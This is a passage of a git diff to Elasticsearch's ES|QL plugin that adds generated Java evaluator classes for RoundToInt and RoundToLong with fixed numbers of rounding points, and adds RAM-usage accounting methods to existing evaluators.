positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToInt6Evaluator get(DriverContext context) { + return new RoundToInt6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToInt6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java new file mode 100644 index 0000000000000..5d4f5a39158d1 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt7Evaluator.java @@ -0,0 +1,175 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToInt7Evaluator get(DriverContext context) { + return new RoundToInt7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToInt7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java new file mode 100644 index 0000000000000..128fc399046d3 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java @@ -0,0 +1,181 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToInt8Evaluator get(DriverContext context) { + return new RoundToInt8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToInt8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java new file mode 100644 index 0000000000000..130926e4c21d4 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java @@ -0,0 +1,187 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToInt9Evaluator get(DriverContext context) { + return new RoundToInt9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToInt9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java index e0bb8becdcca6..ea4b69c69df23 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToIntBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToIntBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java index ed703c3c994f1..0637446d1e980 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToIntLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToIntLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java new file mode 100644 index 0000000000000..b055b25d4cec1 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java @@ -0,0 +1,194 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final long p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, long p8, long p9, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final long p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7, long p8, long p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToLong10Evaluator get(DriverContext context) { + return new RoundToLong10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToLong10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java index d753cefa6a59e..a243b9244d489 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java index 742e69ed8d8dd..30a91bd4c65c8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java index 